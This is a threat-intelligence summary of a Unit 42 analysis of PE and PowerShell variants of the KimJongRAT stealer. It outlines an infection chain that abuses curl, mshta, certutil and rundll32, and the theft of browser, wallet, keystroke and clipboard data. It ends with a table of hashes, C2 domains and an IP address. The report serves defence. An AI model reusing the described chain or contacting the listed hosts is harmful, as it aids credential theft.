Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation

2025-06-17 Paloalto Networks

https://unit42.paloaltonetworks.com/kimjongrat-stealer-variant-powershell/

Thumbnail for Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation

Unit 42 analyzes two new KimJongRAT stealer variants, one PE-based and one PowerShell-based, both initiated by Windows LNK files that retrieve droppers from attacker-controlled content hosted on a legitimate CDN service. The PE chain uses cmd.exe, curl.exe, mshta.exe, certutil.exe, and rundll32.exe to download an HTA file, drop a decoy PDF, user.txt, and a sys.dll loader, then fetch RC4-encrypted payloads named net64.log and main64.log. The loader decrypts and executes the stealer and orchestrator components, while the orchestrator provides C2 communication, backdoor functionality, victim identification, keylogging, clipboard capture, and handling of stolen data. Both variants collect victim and browser data including cryptocurrency-wallet extension data, with the PE variant also collecting FTP and email client information and the PowerShell variant deploying stealer and keylogger scripts.

Indicators of Compromise

Type Value First Seen Last Seen
HASH 4b87b775cdb265ecd872a71be810d78… 2025-06-17 2025-06-17
HASH 8a000aa43c17250dd02f842bc2ab37e… 2025-06-17 2025-06-17
HASH 3c2ea04090ad8c28116c42a9a2be5b2… 2025-06-17 2025-06-17
HASH eb68ed54e543c18070e5cc93a27db4a… 2025-06-17 2025-06-17
HASH 2ba3397cba28af1a929403910035b78… 2025-06-17 2025-06-17
HASH 9e4e45e8f12db94997767bd3899968b… 2025-06-17 2025-06-17
HASH 5a18a29791cfb18767a43bebb61f923… 2025-06-17 2025-06-17
HASH 9c9136fc8a279ce395997dd42c075e2… 2025-06-17 2025-06-17
HASH 945e4f78196ef3a5548996a8d09e422… 2025-06-17 2025-06-17
HASH bcdc99e0f17486aa5a5faa0b9e7d7cc… 2025-06-17 2025-06-17
HASH f4d9547269e0cd7a0df97e394f688e0… 2025-06-17 2025-06-17
HASH 3b0a3bd5b790e5f130e7819550613b7… 2025-06-17 2025-06-17
HASH 97d1bd607b4dc00c356dd873cd4ac30… 2025-06-17 2025-06-17
HASH ab8862628584aa429fe7614d1c674bb… 2025-06-17 2025-06-17
HASH 5097553dff2a2da4f16b80a346fe543… 2025-06-17 2025-06-17
HASH b7dad38a099947612fcc42c50f4ba17… 2025-06-17 2025-06-17
HASH 4e45009f5b582ca404b197d28805e36… 2025-06-17 2025-06-17
HASH f73164bd4d2a475f79fb7d0806cfc3d… 2025-06-17 2025-06-17
HASH c356cd9fea07353a0ee4dfd4652bf79… 2025-06-17 2025-06-17
HASH 3c6476411d214d40d0cc43241f63e93… 2025-06-17 2025-06-17
HASH 8b0b62a31b348c5a2337ee69cfd3f68… 2025-06-17 2025-06-17
HASH ef0ce406fa722d30bfa094c660e81ed… 2025-06-17 2025-06-17
HASH bdb272189a7cdcf166fce130d58b794… 2025-06-17 2025-06-17
HASH d92b858d691c84b4e3752fdd46b5673… 2025-06-17 2025-06-17
HASH 85be5cc01f0e0127a26dceba76571a9… 2025-06-17 2025-06-17
HASH 7a37e2d6dc941386d1f300bac480560… 2025-06-17 2025-06-17
HASH 02783530bbd8416ebc82ab1eb5bbe81… 2025-06-17 2025-06-17
HASH 96df4f9cb5d9cacd6e3b947c61af9b8… 2025-06-17 2025-06-17
HASH accf50d769408253bf9a7da378228de… 2025-06-17 2025-06-17
HASH 9bfbf7618a2c5270d552f4deb69b560… 2025-06-17 2025-06-17
HASH b103190c647ddd7d16766ee5af19e26… 2025-06-17 2025-06-17
HASH be080777332ad1186fb8547a6a354b2… 2025-06-17 2025-06-17
HASH 45980cc8afb4e1b3738130d0855bb60… 2025-06-17 2025-06-17
HASH d7a61ab1b1eadd3b34386ec2a963241… 2025-06-17 2025-06-17
HASH 7a9f4ca13aed4d6d8ba430bc2b2f5ac… 2025-06-17 2025-06-17
HASH b90b2d992b41d146e70b775e2bc0430… 2025-06-17 2025-06-17
HASH 6347d70b73e1cabadf8af8602b22a82… 2025-06-17 2025-06-17
HASH 3589c871b56cf76ce28c6be914b206a… 2025-06-17 2025-06-17
DOMAIN secservice.ddns.net 2025-06-17 2025-06-17
IPv4 131.153.13.235 2025-06-17 2025-06-17
HASH 28f2fcece68822c38e72310c911ef00… 2025-04-04 2025-06-17
DOMAIN srvdown.ddns.net 2025-04-04 2025-06-17
HASH a66c25b1f0dea6e06a4c9f8c5f6ebba… 2025-03-28 2025-06-17

Related Reports

« Back